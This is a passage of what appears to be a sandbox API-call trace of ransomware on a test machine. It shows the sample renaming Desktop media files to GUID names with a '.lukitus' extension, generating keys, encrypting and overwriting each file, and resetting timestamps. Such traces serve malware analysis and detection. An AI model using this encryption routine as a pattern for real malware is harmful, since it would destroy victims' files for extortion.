"c:\\users\\aetadzjz\\desktop\\iija.m4a"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-D452C080-EA561CA54681.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-d452c080-ea561ca54681.lukitus"), dwFlags=0x9) returned 1 [0108.781] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.781] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.787] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xd237, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xd237, lpOverlapped=0x0) returned 1 [0108.788] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.788] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xd237, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xd237, lpOverlapped=0x0) returned 1 [0108.788] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.788] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64dd0530, dwHighDateTime=0x1d31760)) [0108.788] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.788] FlushFileBuffers (hFile=0x328) returned 1 [0108.791] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\l-Vn7zJZk5KM rTdu.mp4" (normalized: "c:\\users\\aetadzjz\\desktop\\l-vn7zjzk5km rtdu.mp4"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fdc0650, ftCreationTime.dwHighDateTime=0x1d2f711, ftLastAccessTime.dwLowDateTime=0x462b4930, ftLastAccessTime.dwHighDateTime=0x1d30554, ftLastWriteTime.dwLowDateTime=0x462b4930, ftLastWriteTime.dwHighDateTime=0x1d30554, nFileSizeHigh=0x0, nFileSizeLow=0x380f)) returned 1 [0108.791] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.791] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.791] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.791] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.791] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.791] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.791] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.791] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.791] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.791] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.791] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.791] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.791] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.791] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.792] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.792] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.792] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.792] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.792] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.792] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.792] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\l-Vn7zJZk5KM rTdu.mp4" (normalized: "c:\\users\\aetadzjz\\desktop\\l-vn7zjzk5km rtdu.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.792] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\l-Vn7zJZk5KM rTdu.mp4" (normalized: "c:\\users\\aetadzjz\\desktop\\l-vn7zjzk5km rtdu.mp4"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-24BB1763-4852852A6D22.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-24bb1763-4852852a6d22.lukitus"), dwFlags=0x9) returned 1 [0108.793] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.793] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.798] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x380f, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x380f, lpOverlapped=0x0) returned 1 [0108.799] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.799] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x380f, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x380f, lpOverlapped=0x0) returned 1 [0108.799] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.799] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64df6690, dwHighDateTime=0x1d31760)) [0108.799] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.799] FlushFileBuffers (hFile=0x328) returned 1 [0108.802] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\N0q0_jKdd.m4a" (normalized: "c:\\users\\aetadzjz\\desktop\\n0q0_jkdd.m4a"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd425720, ftCreationTime.dwHighDateTime=0x1d2f6e6, ftLastAccessTime.dwLowDateTime=0x5aa8fe20, ftLastAccessTime.dwHighDateTime=0x1d2fc30, ftLastWriteTime.dwLowDateTime=0x5aa8fe20, ftLastWriteTime.dwHighDateTime=0x1d2fc30, nFileSizeHigh=0x0, nFileSizeLow=0x18e1a)) returned 1 [0108.802] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.802] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.802] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.802] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.802] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.802] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.802] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.802] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.802] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.802] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.802] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.802] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.802] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.802] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.802] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.802] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.802] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.802] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.802] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.802] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.802] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\N0q0_jKdd.m4a" (normalized: "c:\\users\\aetadzjz\\desktop\\n0q0_jkdd.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.802] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\N0q0_jKdd.m4a" (normalized: "c:\\users\\aetadzjz\\desktop\\n0q0_jkdd.m4a"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-DB63BF46-1ADCD8C466E4.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-db63bf46-1adcd8c466e4.lukitus"), dwFlags=0x9) returned 1 [0108.804] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.804] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.809] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x18e1a, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x18e1a, lpOverlapped=0x0) returned 1 [0108.809] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.809] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x18e1a, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x18e1a, lpOverlapped=0x0) returned 1 [0108.810] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.810] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64e1c7f0, dwHighDateTime=0x1d31760)) [0108.810] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.811] FlushFileBuffers (hFile=0x328) returned 1 [0108.814] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\PQ4Ji1zlt7H.avi" (normalized: "c:\\users\\aetadzjz\\desktop\\pq4ji1zlt7h.avi"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb410b8f0, ftCreationTime.dwHighDateTime=0x1d30378, ftLastAccessTime.dwLowDateTime=0x5049cb70, ftLastAccessTime.dwHighDateTime=0x1d2f691, ftLastWriteTime.dwLowDateTime=0x5049cb70, ftLastWriteTime.dwHighDateTime=0x1d2f691, nFileSizeHigh=0x0, nFileSizeLow=0x13251)) returned 1 [0108.814] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.814] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.814] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.814] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.814] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.814] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.814] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.814] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.814] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.814] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.814] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.814] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.814] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.814] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.814] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.814] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.814] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.814] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.814] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.814] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.814] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\PQ4Ji1zlt7H.avi" (normalized: "c:\\users\\aetadzjz\\desktop\\pq4ji1zlt7h.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.814] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\PQ4Ji1zlt7H.avi" (normalized: "c:\\users\\aetadzjz\\desktop\\pq4ji1zlt7h.avi"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-A2DE357B-0DEE598770CE.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-a2de357b-0dee598770ce.lukitus"), dwFlags=0x9) returned 1 [0108.816] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.816] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.821] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x13251, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x13251, lpOverlapped=0x0) returned 1 [0108.821] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.821] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x13251, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x13251, lpOverlapped=0x0) returned 1 [0108.822] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.823] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64e42950, dwHighDateTime=0x1d31760)) [0108.823] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.823] FlushFileBuffers (hFile=0x328) returned 1 [0108.826] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\PxMz-DaEz.mkv" (normalized: "c:\\users\\aetadzjz\\desktop\\pxmz-daez.mkv"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60e1bf40, ftCreationTime.dwHighDateTime=0x1d2f9e5, ftLastAccessTime.dwLowDateTime=0xf57e4b00, ftLastAccessTime.dwHighDateTime=0x1d30098, ftLastWriteTime.dwLowDateTime=0xf57e4b00, ftLastWriteTime.dwHighDateTime=0x1d30098, nFileSizeHigh=0x0, nFileSizeLow=0x8bfb)) returned 1 [0108.826] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.826] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.826] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.826] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.826] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.826] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.826] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.826] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.826] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.826] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.826] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.826] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.826] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.826] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.826] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.826] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.826] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.826] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.826] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.826] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.826] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\PxMz-DaEz.mkv" (normalized: "c:\\users\\aetadzjz\\desktop\\pxmz-daez.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.826] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\PxMz-DaEz.mkv" (normalized: "c:\\users\\aetadzjz\\desktop\\pxmz-daez.mkv"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-5252DC25-66A07229C2E2.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-5252dc25-66a07229c2e2.lukitus"), dwFlags=0x9) returned 1 [0108.828] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.828] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.833] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x8bfb, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x8bfb, lpOverlapped=0x0) returned 1 [0108.833] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.833] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x8bfb, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x8bfb, lpOverlapped=0x0) returned 1 [0108.834] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.834] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64e42950, dwHighDateTime=0x1d31760)) [0108.834] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.834] FlushFileBuffers (hFile=0x328) returned 1 [0108.837] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\q3jafQj919wjB.wav" (normalized: "c:\\users\\aetadzjz\\desktop\\q3jafqj919wjb.wav"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d9ef560, ftCreationTime.dwHighDateTime=0x1d302d5, ftLastAccessTime.dwLowDateTime=0x4165ad10, ftLastAccessTime.dwHighDateTime=0x1d3049f, ftLastWriteTime.dwLowDateTime=0x4165ad10, 